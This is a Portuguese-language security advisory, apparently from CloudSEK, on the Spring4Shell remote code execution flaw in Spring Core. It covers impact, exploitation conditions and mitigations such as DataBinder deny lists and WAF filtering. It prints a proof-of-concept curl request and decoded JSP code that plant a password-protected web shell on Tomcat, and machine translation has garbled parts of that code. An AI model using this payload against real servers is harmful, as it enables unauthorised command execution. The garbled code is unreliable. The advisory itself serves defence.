🚀 A CloudSEK se torna a primeira empresa de segurança cibernética de origem indiana a receber investimentos da Estado dos EUA fundo
Leia mais
Spring 4 Shell - Sumário executivo
- Uma nova vulnerabilidade crítica de dia zero na popular estrutura Spring para Java ganhou destaque quando sua exploração foi publicada pela primeira vez por um pesquisador de segurança chinês “heige” no Twitter (@80vul).
- Posteriormente, foi confirmado que um desvio lançado para uma vulnerabilidade mais antiga, a CVE-2010-1622, afeta o Spring Core no JDK9+, permitindo que o invasor execute a execução remota de código nos sistemas vulneráveis.
- Anteriormente, um cenário de ataque semelhante foi observado quando os servidores Log4j foram amplamente explorados em dezembro de 2021, para realizar ataques de ransomware em grande escala.
Análise
Java, Spring Boot, Auth0, Bugsnag e Java EE são algumas das ferramentas populares que se integram ao Spring. 544 empresas supostamente usam o Spring em suas tecnologias, incluindo Accenture e Zalando.ExploraçãoPara explorar com êxito a vulnerabilidade, o DataBinder deve estar ativado. Em alguns casos, tudo o que um invasor precisa fazer é enviar uma solicitação HTTP especialmente criada para um sistema vulnerável para explorar a vulnerabilidade. Por outro lado, a exploração de certas outras configurações requer pesquisas extras para desenvolver uma carga útil eficaz.
Sobre a exploração bem-sucedidaOs agentes de ameaças podem aproveitar essas explorações para executar comandos no servidor, concedendo-lhes acesso inicial ao dispositivo.Digitalização em massaOs agentes de ameaças poderão criar scripts que rastreiam a Internet e exploram automaticamente servidores suscetíveis, pois a exploração envolve apenas um simples HTTP POST para um aplicativo vulnerável.Nota: A vulnerabilidade de dia zero do Java Spring Core, também apelidada de “Spring4Shell”, não está relacionada às outras vulnerabilidades divulgadas na estrutura Spring nesta semana, incluindo a vulnerabilidade DoS (CVE-2022-22950) e a vulnerabilidade de acesso a recursos de expressão do Spring Cloud (CVE-2022-22963).
Informações da OSINT
As várias postagens relacionadas ao exploit lançado para o Spring4Shell estão listadas a seguir:
- O PoC vazado por”olá exp”, que parecia permitir que invasores não autenticados executassem código nos sistemas de destino, foi posteriormente excluído.
Prova de conceito (exploração)
curl -v -d “class.module.classloader.resources.context.parent.pipeline .first.pattern=% 25% 7Bc 2% 7di%20if (%22j%22.equals (request.getParameter (% 22pwd%22))) %7B%20java.io.InputStream%20in% 20% 3D% 20% 25% 7Bc 1% 7di.InputStream%20in% 20% 3D% 25% 7Bc 1% 7di.inputStream%20in% 20% 3D% 25% 7Bc 1% 7DI.getRunt ime () .exec (request.getParameter (%22cmd%22)) .getInputStream () %3B%20int% 20a% 20% 3D% 20-1% 3B%20byte%5B%5D%20B% 20% 3D%20New%20Byte%5B 2048% 5D%3B%20 while (A%3DIN.read (b)) 3D-1) %7B%20out.println (new%20String (b)) %3B% 20% 7 D% 20% 7D% 20% 25% 7BSuffix%7DI&class.module.classloader.resources.context .parent.pipeline.first.suffix=.jsp&class.module.classloader.resources. context.parent.pipeline.first.directory=webapps/root&class.module.cl assloader.resources.context.parent.pipeline.first.prefix=tomcatwar&cl ass.module.classloader.resources.context.parent.pipeline.first.filedat eFormat=” http://localhost:8080/springmvc5-helloworld-exmaple-0.0.1 - Snapshot/rapid7
Essa carga coloca um shell web protegido por senha no diretório raiz do Tomcat chamado tomcatwar.jsp
- if (“j” .equals (request.getParameter (“pwd”))) {java.io.inputStream in = -.getRuntime () .exec (request.getParameter (“cmd”)) .getInputStream (); int a = -1; byte [] b = novo byte [2048]; while ((a=in.read (b)) 3D-1) {out. println (nova string (b));}} -
Essa carga útil específica do servidor Tomcat altera as propriedades de registro do servidor Tomcat via ClassLoader. O payload simplesmente redireciona a lógica de registro para o diretório ROOT e descarta o arquivo + payload.
Spring 4 Shell - Impacto: quem e o quê
Os usuários que executam o JDK versão 9 e mais recente estão vulneráveis a um ataque RCE. Além disso, diz-se que todas as versões do Spring Core foram afetadas.
No momento, não há nenhum patch oficial da primavera. Portanto, os agentes de ameaças podem aproveitar essa vulnerabilidade para atuar execução remota não autorizada de código. Devido à facilidade de exploração, os agentes da ameaça podem realizar atividades de exploração em grande escala semelhante ao Log4j. Os atacantes podem explorar a vulnerabilidade para realizar ataques de malware ou ransomware em uma organização
Mitigação
No Spring Framework, o DataBinder tem a funcionalidade de proibir certos padrões. Como mitigação temporária dessa vulnerabilidade, o Conselhos para controladores um componente pode ser criado (que é um componente Spring compartilhado entre os Controllers) e padrões perigosos podem ser adicionados à lista de negação.
Em dispositivos de proteção de rede, como WAF, implemente a filtragem de regras para cadeias de caracteres como “class.*”, “Class.*”, “*.class.*” e “*.Class.*” de acordo com a situação real do tráfego dos serviços implantados. Isso ocorre porque o “Spring4Shell” aproveita a injeção de classe (muito severa)
Por fim, deve-se ficar atualizado sobre a versão mais recente dos patches oficiais da Spring e corrigir as vulnerabilidades de acordo com esses patches.
Referências
- SpringShell: Vulnerabilidade de 0 dias no Spring Core RCE - Cyber Kendra
- Bug de RCE de 0 dias do Java Spring Framework não corrigido ameaça a segurança de aplicativos Web corporativos
- Spring4Shell: vulnerabilidade de dia zero no Spring Framework | Rapid7 Blog
- O Spring Core no JDK9+ é vulnerável à execução remota de código - Praetorian
- https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/
